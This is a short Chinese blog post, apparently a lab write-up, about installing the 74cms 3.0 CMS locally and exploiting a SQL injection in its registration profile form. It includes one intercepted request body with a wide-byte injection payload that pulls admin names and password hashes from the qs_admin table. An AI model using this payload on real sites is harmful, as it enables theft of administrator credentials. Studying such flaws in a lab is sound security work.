下载解压到www目录并开启低版本PHP服务
访问
http://127.0.0.1/74cms3.0/install/index.phpError:Can‘t select MySQL database(74cms3.0)!问题解决
文章图片
和我一样就无脑确定
文章图片
按照提示配置,不知道填啥就写root,邮箱随便写一个@qq.com之类的
文章图片
后台(可略过)
文章图片
文章图片
前台
注册
文章图片
文章图片
文章图片
burpsuite抓包修改
realname=%B5%C8%D6%B0%EDE&sex=%C4%D0&birthday=1999-01-01&addresses=%BA%D3%C4%CF%BA%D3%C4%CF%D6%A3%D6%DD&mobile=&phone=17640366942&qq=15017777&msn=ha%df',profile=(select concat(admin_name,pwd,pwd_hash)from qs_admin)#&Submit=%B1%A3%B4%E6
文章图片
有返回
文章图片
以下原因是由于PHP版本过低,
文章图片
文章图片
【演武场|74cms3.0安装以及cmsSQL注入漏洞详解】
推荐阅读
- 数据库|SQL注入漏洞 详解
- sql|SQL注入漏洞详解
- 运维|拥有自己的私有云盘-使用Docker安装nextcloud云盘
- 极客前端|移动端兼容宝典大全,专治各种不适
- AppGallery|使用Cloud DB构建APP 快速入门 - iOS篇
- mysql8.0的改进与避坑浅谈
- Python爬虫|逆向系列 | AES逆向加密案例分析
- 程序员|【web安全】Spring Boot eureka xstream 反序列化
- EEE6207